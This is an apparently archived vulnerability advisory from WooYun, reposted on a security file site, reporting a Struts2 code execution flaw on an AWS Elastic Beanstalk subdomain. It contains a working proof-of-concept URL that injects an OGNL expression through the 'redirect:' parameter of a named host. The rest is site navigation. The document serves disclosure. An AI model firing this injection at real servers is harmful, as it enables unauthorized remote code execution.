AWS Elastic Beanstalk Code Execution

AWS Elastic Beanstalk Code Execution: Posted Dec 27, 2013; Authored by WooYun; Amazon Web Services Elastic Beanstalk suffers from a code execution vulnerability.; tags | exploit, web, code execution; SHA-256 | 9627d5239332fca927a6137f308067102214ba471ccb72e6c5da1b446bc2f5dc; Download | Favorite | View

AWS Elastic Beanstalk Code Execution

*Form:*http://en.wooyun.org/bugs/wooyun-2013-040


*Abstract£º*

AWS Elastic Beanstalk is an even easier way for you to quickly deploy and
manage applications in the AWS cloud. elasticbeanstalk subdomain exists
Struts2 code execution .

*Details£º*

poc return [/ok]:
http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}

-- 
WooYun, an Open and Free Vulnerability Reporting Platform

For more information, please visit http://en.wooyun.org/about.php

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

AWS Elastic Beanstalk Code Execution

AWS Elastic Beanstalk Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AWS Elastic Beanstalk Code Execution

Share This

AWS Elastic Beanstalk Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems